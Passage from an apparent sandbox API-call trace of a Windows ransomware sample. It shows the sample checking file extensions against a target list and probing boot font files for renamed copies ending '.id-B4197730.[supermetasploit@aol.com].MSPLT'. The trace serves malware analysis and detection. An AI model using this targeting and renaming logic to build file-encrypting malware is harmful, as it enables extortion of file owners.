(lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.731] lstrlenW (lpString=".1cd") returned 4 [0285.732] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.732] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.732] lstrlenW (lpString=".jpg") returned 4 [0285.732] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.732] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.732] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.732] lstrlenW (lpString=".doc") returned 4 [0285.732] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.732] lstrlenW (lpString=".docx") returned 5 [0285.732] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.733] lstrlenW (lpString=".pdf") returned 4 [0285.733] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.733] lstrlenW (lpString=".xls") returned 4 [0285.733] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0285.733] lstrlenW (lpString=".xlsx") returned 5 [0285.733] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0285.733] lstrlenW (lpString=".ppt") returned 4 [0285.733] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.733] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.733] lstrlenW (lpString=".zip") returned 4 [0285.733] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0285.733] lstrlenW (lpString=".rar") returned 4 [0285.733] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.733] lstrlenW (lpString=".bz2") returned 4 [0285.733] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.734] lstrlenW (lpString=".7z") returned 3 [0285.734] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0285.734] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.734] lstrlenW (lpString=".dbf") returned 4 [0285.737] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.737] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.737] lstrlenW (lpString=".1cd") returned 4 [0285.737] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0285.737] lstrlenW (lpString="C:\\Boot\\fi-FI\\bootmgr.exe.mui") returned 29 [0285.737] lstrlenW (lpString=".jpg") returned 4 [0285.737] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.737] Sleep (dwMilliseconds=0x64) [0286.039] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0286.039] lstrlenW (lpString="msyhn_boot.ttf") returned 14 [0286.039] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.040] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=154427) returned 1 [0286.040] CloseHandle (hObject=0x3e4) returned 1 [0286.040] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf")) returned 0x20 [0286.040] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.040] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.040] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.040] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.041] lstrlenW (lpString=".doc") returned 4 [0286.041] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.041] lstrlenW (lpString=".docx") returned 5 [0286.041] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.041] lstrlenW (lpString=".pdf") returned 4 [0286.041] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.041] lstrlenW (lpString=".xls") returned 4 [0286.041] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.041] lstrlenW (lpString=".xlsx") returned 5 [0286.041] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.041] lstrlenW (lpString=".ppt") returned 4 [0286.041] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.041] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.041] lstrlenW (lpString=".zip") returned 4 [0286.041] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.041] lstrlenW (lpString=".rar") returned 4 [0286.041] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.041] lstrlenW (lpString=".bz2") returned 4 [0286.041] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.041] lstrlenW (lpString=".7z") returned 3 [0286.041] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.041] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.041] lstrlenW (lpString=".dbf") returned 4 [0286.041] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.041] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.041] lstrlenW (lpString=".1cd") returned 4 [0286.041] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.041] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.041] lstrlenW (lpString=".jpg") returned 4 [0286.041] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.042] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.042] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.042] lstrlenW (lpString=".doc") returned 4 [0286.042] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.042] lstrlenW (lpString=".docx") returned 5 [0286.042] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.042] lstrlenW (lpString=".pdf") returned 4 [0286.042] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.042] lstrlenW (lpString=".xls") returned 4 [0286.042] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.042] lstrlenW (lpString=".xlsx") returned 5 [0286.042] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.042] lstrlenW (lpString=".ppt") returned 4 [0286.042] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.042] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.042] lstrlenW (lpString=".zip") returned 4 [0286.042] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.042] lstrlenW (lpString=".rar") returned 4 [0286.042] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.042] lstrlenW (lpString=".bz2") returned 4 [0286.042] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.042] lstrlenW (lpString=".7z") returned 3 [0286.042] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.042] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.042] lstrlenW (lpString=".dbf") returned 4 [0286.042] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.042] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.042] lstrlenW (lpString=".1cd") returned 4 [0286.042] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.042] lstrlenW (lpString="C:\\Boot\\Fonts\\msyhn_boot.ttf") returned 28 [0286.042] lstrlenW (lpString=".jpg") returned 4 [0286.042] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.043] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0286.043] lstrlenW (lpString="msyh_boot.ttf") returned 13 [0286.043] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.043] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=156245) returned 1 [0286.043] CloseHandle (hObject=0x3e4) returned 1 [0286.043] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf")) returned 0x20 [0286.043] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.043] CreateFileW (lpFileName="C:\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.044] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.044] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.044] lstrlenW (lpString=".doc") returned 4 [0286.044] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.044] lstrlenW (lpString=".docx") returned 5 [0286.044] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.044] lstrlenW (lpString=".pdf") returned 4 [0286.044] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.044] lstrlenW (lpString=".xls") returned 4 [0286.044] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.044] lstrlenW (lpString=".xlsx") returned 5 [0286.044] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.044] lstrlenW (lpString=".ppt") returned 4 [0286.044] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.044] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.044] lstrlenW (lpString=".zip") returned 4 [0286.044] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.044] lstrlenW (lpString=".rar") returned 4 [0286.044] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.044] lstrlenW (lpString=".bz2") returned 4 [0286.044] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.044] lstrlenW (lpString=".7z") returned 3 [0286.044] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.044] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.044] lstrlenW (lpString=".dbf") returned 4 [0286.044] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.044] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.044] lstrlenW (lpString=".1cd") returned 4 [0286.044] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.044] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.044] lstrlenW (lpString=".jpg") returned 4 [0286.044] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.045] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.045] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.045] lstrlenW (lpString=".doc") returned 4 [0286.045] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.045] lstrlenW (lpString=".docx") returned 5 [0286.045] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.045] lstrlenW (lpString=".pdf") returned 4 [0286.045] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.045] lstrlenW (lpString=".xls") returned 4 [0286.045] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.045] lstrlenW (lpString=".xlsx") returned 5 [0286.045] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.045] lstrlenW (lpString=".ppt") returned 4 [0286.045] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.045] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.045] lstrlenW (lpString=".zip") returned 4 [0286.045] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.045] lstrlenW (lpString=".rar") returned 4 [0286.045] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.045] lstrlenW (lpString=".bz2") returned 4 [0286.045] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.045] lstrlenW (lpString=".7z") returned 3 [0286.045] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.045] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.045] lstrlenW (lpString=".dbf") returned 4 [0286.045] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.045] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.045] lstrlenW (lpString=".1cd") returned 4 [0286.045] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.045] lstrlenW (lpString="C:\\Boot\\Fonts\\msyh_boot.ttf") returned 27 [0286.045] lstrlenW (lpString=".jpg") returned 4 [0286.045] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.046] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0286.046] lstrlenW (lpString="segmono_boot.ttf") returned 16 [0286.046] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.047] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=44859) returned 1 [0286.047] CloseHandle (hObject=0x3e4) returned 1 [0286.047] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf")) returned 0x20 [0286.047] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.047] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.047] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.047] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.047] lstrlenW (lpString=".doc") returned 4 [0286.047] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.047] lstrlenW (lpString=".docx") returned 5 [0286.047] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.047] lstrlenW (lpString=".pdf") returned 4 [0286.047] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.047] lstrlenW (lpString=".xls") returned 4 [0286.047] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.047] lstrlenW (lpString=".xlsx") returned 5 [0286.047] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.047] lstrlenW (lpString=".ppt") returned 4 [0286.048] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.048] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.048] lstrlenW (lpString=".zip") returned 4 [0286.048] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.048] lstrlenW (lpString=".rar") returned 4 [0286.048] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.048] lstrlenW (lpString=".bz2") returned 4 [0286.048] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.048] lstrlenW (lpString=".7z") returned 3 [0286.048] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.048] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.048] lstrlenW (lpString=".dbf") returned 4 [0286.048] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.048] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.048] lstrlenW (lpString=".1cd") returned 4 [0286.048] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.048] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.048] lstrlenW (lpString=".jpg") returned 4 [0286.048] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.048] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.048] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.048] lstrlenW (lpString=".doc") returned 4 [0286.048] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.048] lstrlenW (lpString=".docx") returned 5 [0286.048] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.048] lstrlenW (lpString=".pdf") returned 4 [0286.048] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.048] lstrlenW (lpString=".xls") returned 4 [0286.048] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.049] lstrlenW (lpString=".xlsx") returned 5 [0286.049] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.049] lstrlenW (lpString=".ppt") returned 4 [0286.049] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.049] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.049] lstrlenW (lpString=".zip") returned 4 [0286.049] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.049] lstrlenW (lpString=".rar") returned 4 [0286.049] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.049] lstrlenW (lpString=".bz2") returned 4 [0286.049] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.049] lstrlenW (lpString=".7z") returned 3 [0286.049] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.049] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.049] lstrlenW (lpString=".dbf") returned 4 [0286.049] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.049] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.049] lstrlenW (lpString=".1cd") returned 4 [0286.049] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.049] lstrlenW (lpString="C:\\Boot\\Fonts\\segmono_boot.ttf") returned 30 [0286.049] lstrlenW (lpString=".jpg") returned 4 [0286.049] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.049] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0286.049] lstrlenW (lpString="segoen_slboot.ttf") returned 17 [0286.049] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.050] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=85862) returned 1 [0286.050] CloseHandle (hObject=0x3e4) returned 1 [0286.050] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf")) returned 0x20 [0286.050] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.050] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.050] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.050] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.050] lstrlenW (lpString=".doc") returned 4 [0286.050] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.050] lstrlenW (lpString=".docx") returned 5 [0286.050] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.050] lstrlenW (lpString=".pdf") returned 4 [0286.050] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.050] lstrlenW (lpString=".xls") returned 4 [0286.050] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.050] lstrlenW (lpString=".xlsx") returned 5 [0286.051] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.051] lstrlenW (lpString=".ppt") returned 4 [0286.051] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.051] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.051] lstrlenW (lpString=".zip") returned 4 [0286.051] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.051] lstrlenW (lpString=".rar") returned 4 [0286.051] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.051] lstrlenW (lpString=".bz2") returned 4 [0286.051] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.051] lstrlenW (lpString=".7z") returned 3 [0286.051] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.051] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.051] lstrlenW (lpString=".dbf") returned 4 [0286.051] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.051] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.051] lstrlenW (lpString=".1cd") returned 4 [0286.051] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.051] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.051] lstrlenW (lpString=".jpg") returned 4 [0286.051] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.051] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.051] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.051] lstrlenW (lpString=".doc") returned 4 [0286.051] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.051] lstrlenW (lpString=".docx") returned 5 [0286.051] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.051] lstrlenW (lpString=".pdf") returned 4 [0286.051] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.051] lstrlenW (lpString=".xls") returned 4 [0286.052] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.052] lstrlenW (lpString=".xlsx") returned 5 [0286.052] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.052] lstrlenW (lpString=".ppt") returned 4 [0286.052] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.052] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.052] lstrlenW (lpString=".zip") returned 4 [0286.052] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.052] lstrlenW (lpString=".rar") returned 4 [0286.052] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0286.052] lstrlenW (lpString=".bz2") returned 4 [0286.052] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0286.052] lstrlenW (lpString=".7z") returned 3 [0286.052] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0286.052] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.052] lstrlenW (lpString=".dbf") returned 4 [0286.052] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0286.052] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.052] lstrlenW (lpString=".1cd") returned 4 [0286.052] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0286.052] lstrlenW (lpString="C:\\Boot\\Fonts\\segoen_slboot.ttf") returned 31 [0286.052] lstrlenW (lpString=".jpg") returned 4 [0286.052] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0286.052] lstrcmpiW (lpString1=".ttf", lpString2=".MSPLT") returned 1 [0286.052] lstrlenW (lpString="segoe_slboot.ttf") returned 16 [0286.052] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0286.053] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=86178) returned 1 [0286.053] CloseHandle (hObject=0x3e4) returned 1 [0286.053] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf")) returned 0x20 [0286.053] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0286.053] CreateFileW (lpFileName="C:\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0286.053] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.053] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.053] lstrlenW (lpString=".doc") returned 4 [0286.053] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0286.053] lstrlenW (lpString=".docx") returned 5 [0286.054] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0286.054] lstrlenW (lpString=".pdf") returned 4 [0286.054] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0286.054] lstrlenW (lpString=".xls") returned 4 [0286.054] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0286.054] lstrlenW (lpString=".xlsx") returned 5 [0286.054] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0286.054] lstrlenW (lpString=".ppt") returned 4 [0286.054] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0286.054] lstrlenW (lpString="C:\\Boot\\Fonts\\segoe_slboot.ttf") returned 30 [0286.054] lstrlenW (lpString=".zip") returned 4 [0286.054] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0286.054] lstrlenW (lpString=".rar") returned 4 [0286.054] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned 